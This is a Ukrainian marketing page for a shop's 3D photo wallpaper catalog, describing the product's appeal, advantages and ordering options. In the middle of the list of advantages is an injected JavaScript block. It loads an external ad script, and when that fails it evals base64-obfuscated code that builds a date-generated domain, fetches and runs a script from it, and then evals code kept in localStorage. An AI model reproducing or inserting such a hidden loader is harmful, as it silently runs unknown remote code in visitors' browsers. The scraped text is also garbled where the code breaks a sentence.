Каталог 3D фотошпалер

3D фотошпалери – декоративно-оздоблювальний матеріал, який міцно зайняв позиції лідера на сучасному ринку. Популярність полотен можна з легкістю пояснити неймовірно великим асортиментом різноманітних сюжетів та якістю виконання. Універсальні фото шпалери підходять для оформлення будь-якої кімнати в домі. Окрім цього, подібний матеріал ідеально вписується в офісні приміщення, а також кабінети, зали та холи кафе чи ресторанів. Головне, визначитися з сюжетом, розміром та загальною стилістикою фото шпалер.

3Д обои в интерьере Особливість 3д фото шпалер

3д фотошпалери – це оздоблювальний матеріал, який виготовляється за особливою технологією, яка дозволяє нанести на основу об’ємний малюнок. Подібне покриття захоплює своєю не реальністю, переносить у сюжет, повністю захоплюючі уяву та свідомість того, хто на них дивиться.

Дизайнери все частіше рекомендують обирати в якості декоративного матеріалу саме 3д фотошпалери, адже вони здатні повністю змінити просторове сприйняття кімнати, візуально розширити приміщення, заселити в нього більше кольору, світла, незвичайної атмосфери. В залежності від обраного напрямку та стилю в інтер’єрі кімнати можна підібрати полотна з динамічним, збуджуючим сюжетом; а можна навпаки, підібрати зображення, яке буде викликати відчуття спокою, безпеки, затишку.

Переваги 3д фото шпалер

Зупиняючи свій вибір на 3D фотошпалерах, кожен покупець повинен знати, які ж головні переваги він здобуває разом з вражаючим малюнком:

довговічність та зносостійкість декоративного матеріалу

можливість зонувати простір, що особливо актуально для сучасних квартир з вільним плануванням

полотна приховують недоліки стін var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

не вимагають до себе багато уваги

легко монтуються на стіну

використовуються в будь-якій кімнаті.

Також, фото шпалери с об’ємним зображенням можуть бути різного розміру. Тому їх монтаж актуальний як для великих холів. так і для маленьких кімнат. Дизайнери рекомендують не перевантажувати кімнату, стіна в якій прикрашена 3д фото шпалерами додатковими декоративними елементами, адже вони здатні знищити ефект присутності картинки та зіпсувати загальне враження від полотна.

3Д обои в интерьере Купити 3д фотошпалери

Наш інтернет магазин пропонує переглянути каталог з найкращими 3д фото шпалерами https://artside.com.ua/ua/3d-oboi/catalogта вибрати найбільш цікаві варіанти для оформлення кімнат у домі, офісі. У нас низькі на фотошпалери ціни, консультаційна допомога в процесі вибору, доставка шпалер по всій країні в найкоротші терміни, гарантія якості кожної, представленої в каталозі товарної одиниці. Якщо в каталозі не знайшлося цікавого варіанту, або ж у покупця є власні ідеї та ескізи для їх реалізації у життя, ми із задоволенням виготовимо фотошпалери на замовлення.

Для того, щоб купити полотна з 3д ефектом достатньо лише подзвонити нашим консультантам за вказаними в контактній інформації телефонами, або ж скористатися онлайн кошиком. Ми зробимо все від нас залежне, щоб спілкування та співробітництво з нами принесло лише задоволення та позитивні емоції кожному покупцеві. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/katalog-3d-fotoshpaler/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top